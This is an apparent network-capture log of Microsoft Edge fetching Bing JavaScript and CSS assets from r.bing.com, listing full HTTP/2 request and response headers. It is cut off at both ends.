content-md5: kSd0hTdqYlIKxD09mZrqMA==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 19451da4-501e-0046-6040-1a3406000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=282481
expires: Sat, 07 Dec 2024 16:36:16 GMT
date: Wed, 04 Dec 2024 10:08:15 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306895.1af16f9
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/ulJ3ckR0YcGpvIX6xhO4prJhEQQ.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/ulJ3ckR0YcGpvIX6xhO4prJhEQQ.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://www.bing.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 07:09:09 GMT
etag: 0x8DCDC67C959D1C6
content-length: 230
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: e8o72fCkQwkU95GMyH4alQ==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: ce50cb20-d01e-0018-1b62-17c705000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=268129
expires: Sat, 07 Dec 2024 12:37:04 GMT
date: Wed, 04 Dec 2024 10:08:15 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306895.1af16fa
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/PI66J6yUeAgQH6Cb_oNyPyq41rA.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/PI66J6yUeAgQH6Cb_oNyPyq41rA.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://www.bing.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Fri, 22 Nov 2024 14:04:41 GMT
etag: 0x8DD0AFE9C2E3B73
content-length: 12978
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: 5qH3oGOZedQrMyt/+53gfg==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: c50535fa-301e-0056-3a08-3d02e0000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=187007
expires: Fri, 06 Dec 2024 14:05:02 GMT
date: Wed, 04 Dec 2024 10:08:15 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306895.1af1ab5
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/QBeRBYHcEega8cGdoBwhWOHfENg.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/QBeRBYHcEega8cGdoBwhWOHfENg.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://www.bing.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Thu, 21 Nov 2024 11:01:41 GMT
etag: 0x8DD0A1BE1097459
content-length: 26508
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: 4ptEhyMTSi22iL8aO/cLNw==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: efd79241-501e-0046-483d-3c3406000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
akamai-grn: 0.60ba1302.1732230924.f0b8d466
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
cache-control: public, no-transform, max-age=137551
expires: Fri, 06 Dec 2024 00:20:46 GMT
date: Wed, 04 Dec 2024 10:08:15 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306895.1af1ab4
timing-allow-origin: *
GET

https://r.bing.com/rp/fgwXynIC1LSPT4bQdaeDy2ze6_w.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/fgwXynIC1LSPT4bQdaeDy2ze6_w.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://www.bing.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Thu, 10 Oct 2024 00:33:38 GMT
etag: 0x8DCE8C32F0C35F0
content-length: 78988
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: xtAz0+xF1wQXRASIjvNKzQ==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 2cfa3868-401e-0052-36bc-36f762000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
akamai-grn: 0.a9777b5c.1731633726.138b837f
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
cache-control: public, no-transform, max-age=209857
expires: Fri, 06 Dec 2024 20:25:53 GMT
date: Wed, 04 Dec 2024 10:08:16 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306896.1af1c58
timing-allow-origin: *
GET

https://r.bing.com/rp/sPLpq--qtLsYg9wNMtvnXReRLXo.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/sPLpq--qtLsYg9wNMtvnXReRLXo.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://www.bing.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Thu, 10 Oct 2024 00:31:56 GMT
etag: 0x8DCE8C2F2388533
content-length: 210900
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: /R2xZztIeKAQbWF2joZR5w==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: d20dd7b6-001e-0038-48bc-36abc9000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
akamai-grn: 0.a7777b5c.1731643910.e96cdc
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
cache-control: public, no-transform, max-age=329433
expires: Sun, 08 Dec 2024 05:38:49 GMT
date: Wed, 04 Dec 2024 10:08:16 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306896.1af1c57
timing-allow-origin: *
GET

https://r.bing.com/rp/xtWmxmXYE-lclN8c7rkr87juUqo.br.css

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/xtWmxmXYE-lclN8c7rkr87juUqo.br.css HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://www.bing.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: text/css,*/*;q=0.1
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: style
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-type: text/javascript; charset=utf-8
content-md5: Tqy2YOk1byQeVHLtpSyTUQ==
last-modified: Fri, 22 Nov 2024 03:43:52 GMT
etag: 0x8DD0AA7E247B721
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 6611f1dc-801e-006d-022e-3d40be000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 37160
cache-control: public, no-transform, max-age=210382
expires: Fri, 06 Dec 2024 20:34:38 GMT
date: Wed, 04 Dec 2024 10:08:16 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306896.1af1c6d
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/4d8z9iwCd5lQQTKNHXRaYH6vu80.br.css

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/4d8z9iwCd5lQQTKNHXRaYH6vu80.br.css HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://www.bing.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: text/css,*/*;q=0.1
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: style
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 30234
content-type: text/css; charset=utf-8
server: Kestrel
access-control-allow-headers: *
access-control-allow-origin: *
content-encoding: br
last-modified: Tue, 29 Oct 2024 18:00:07 GMT
x-eventid: 672c6127c4944c1e94f945358d819c22
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
x-as-instrumentationoptions: AppServerLoggingMaster=1
x-as-machinename: DUBEEAP0000E12B
x-as-suppresssetcookie: 1
content-security-policy-report-only: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-ml03bkD0LuexnhWgIT6k7FqGY3NBC48/SiEk4ePpFx8='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingrms"}]}
cross-origin-resource-policy: cross-origin
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.75}
cache-control: public, max-age=422241
expires: Mon, 09 Dec 2024 07:25:37 GMT
date: Wed, 04 Dec 2024 10:08:16 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306896.1af1c6c
timing-allow-origin: *
GET

https://r.bing.com/rp/17Th46dH8-iJqzwLwGBaqy1Kqrk.br.css

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/17Th46dH8-iJqzwLwGBaqy1Kqrk.br.css HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://www.bing.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: text/css,*/*;q=0.1
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: style
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Thu, 14 Nov 2024 09:51:51 GMT
etag: 0x8DD0491F692A3D0
content-length: 13965
content-type: text/css
content-encoding: br
content-md5: hz0RO/8Z8dgc9v1bFzY3oQ==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: b19812c9-c01e-0048-7abd-36d80d000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
akamai-grn: 0.4c1a1202.1731634765.1b57c779
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
cache-control: public, no-transform, max-age=315294
expires: Sun, 08 Dec 2024 01:43:10 GMT
date: Wed, 04 Dec 2024 10:08:16 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306896.1af1c69
timing-allow-origin: *
GET

https://r.bing.com/rb/3b/cir3,cc,nc/7krp3zY1SpdQCtCMQ-8Fi0TxaJg.css?bu=BnyVAZ0BtAGCAYIB&or=w

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rb/3b/cir3,cc,nc/7krp3zY1SpdQCtCMQ-8Fi0TxaJg.css?bu=BnyVAZ0BtAGCAYIB&or=w HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://www.bing.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: text/css,*/*;q=0.1
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: style
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Fri, 22 Nov 2024 20:37:06 GMT
etag: 0x8DD0B356E057586
content-length: 2201
content-type: text/css
content-encoding: br
content-md5: q4gpN0dBiVmBYoqGkBt2vw==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 335eee30-401e-0034-706d-3d4538000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=45290
expires: Wed, 04 Dec 2024 22:43:06 GMT
date: Wed, 04 Dec 2024 10:08:16 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306896.1af1c6a
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/Nj12x2s3Tkmcvd_89yW3fccIoRc.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/Nj12x2s3Tkmcvd_89yW3fccIoRc.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://www.bing.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 97
content-type: text/css
content-encoding: br
content-md5: 4ukWMsk2pZrmKNHRzfCaQQ==
last-modified: Mon, 14 Oct 2024 19:29:55 GMT
etag: 0x8DCEC86950F5859
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 46996833-e01e-0010-809a-21dc76000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=383325
expires: Sun, 08 Dec 2024 20:37:01 GMT
date: Wed, 04 Dec 2024 10:08:16 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306896.1af1c6b
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/NBMhbsm_vcsGnfml9Y-euaNWIO8.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/NBMhbsm_vcsGnfml9Y-euaNWIO8.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://www.bing.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Fri, 22 Nov 2024 20:37:21 GMT
etag: 0x8DD0B3576C5FFEF
content-length: 18402
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: WJcmAmMQxS47bz+rYXThqw==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 1aeb7014-501e-0020-646d-3d865c000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
akamai-grn: 0.c68f655f.1732383085.a633d9e
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
cache-control: public, no-transform, max-age=249505
expires: Sat, 07 Dec 2024 07:26:41 GMT
date: Wed, 04 Dec 2024 10:08:16 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306896.1af1c6f
timing-allow-origin: *
GET

https://r.bing.com/rp/AQRxfJotTIT0u5ADh8jSC4Fu_aA.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/AQRxfJotTIT0u5ADh8jSC4Fu_aA.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://www.bing.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Mon, 14 Oct 2024 19:29:57 GMT
etag: 0x8DCEC869676F150
content-length: 3546
content-type: text/css
content-encoding: br
content-md5: PqCxe2HcGlcYWRvo4MDdBQ==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: e42c812e-c01e-006a-06bc-36b63b000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
akamai-grn: 0.5e6e5668.1731629820.8b7be2b
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
cache-control: public, no-transform, max-age=176091
expires: Fri, 06 Dec 2024 11:03:07 GMT
date: Wed, 04 Dec 2024 10:08:16 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306896.1af1c7c
timing-allow-origin: *
GET

https://r.bing.com/rp/OTETANOfu0vB9aZz3PvT5ku6H9o.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/OTETANOfu0vB9aZz3PvT5ku6H9o.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://www.bing.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Thu, 10 Oct 2024 00:27:16 GMT
etag: 0x8DCE8C24B3CE20B
content-length: 24341
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: 8eKE4Ewa7NcESUwWTMk2Jw==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: d69fda01-901e-001f-2cbc-363180000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
akamai-grn: 0.4c1a1202.1731633726.1b4a8e11
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
cache-control: public, no-transform, max-age=324005
expires: Sun, 08 Dec 2024 04:08:21 GMT
date: Wed, 04 Dec 2024 10:08:16 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306896.1af1c7a
timing-allow-origin: *
GET

https://r.bing.com/rp/15L2ameFcugDthEu6NasmGCgCmY.br.css

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/15L2ameFcugDthEu6NasmGCgCmY.br.css HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://www.bing.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: text/css,*/*;q=0.1
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: style
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Thu, 10 Oct 2024 00:28:55 GMT
etag: 0x8DCE8C28688756B
content-length: 2702
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: cWHs5f/3hENGQ4VVXngnqg==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 2cc0512f-801e-0029-03bc-369cd2000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
akamai-grn: 0.a9777b5c.1731634774.139ae09a
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
cache-control: public, no-transform, max-age=301257
expires: Sat, 07 Dec 2024 21:49:13 GMT
date: Wed, 04 Dec 2024 10:08:16 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306896.1af1c7b
timing-allow-origin: *
GET

https://r.bing.com/rp/pHLyVO8Ql7supJI2u3RKOfWfh7I.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/pHLyVO8Ql7supJI2u3RKOfWfh7I.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://www.bing.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Fri, 22 Nov 2024 03:43:53 GMT
etag: 0x8DD0AA7E28B1EE9
content-length: 35145
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: li6Reus4SRyO+g6+A2rqTg==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: d88369e7-201e-0060-0107-3dafb2000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
akamai-grn: 0.521a1202.1732312543.f05d41d9
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
cache-control: public, no-transform, max-age=208453
expires: Fri, 06 Dec 2024 20:02:29 GMT
date: Wed, 04 Dec 2024 10:08:16 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306896.1af1c83
timing-allow-origin: *
GET

https://r.bing.com/rp/D63nIJ6i6BXZwp8OC-rtWWodXW8.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/D63nIJ6i6BXZwp8OC-rtWWodXW8.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://www.bing.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

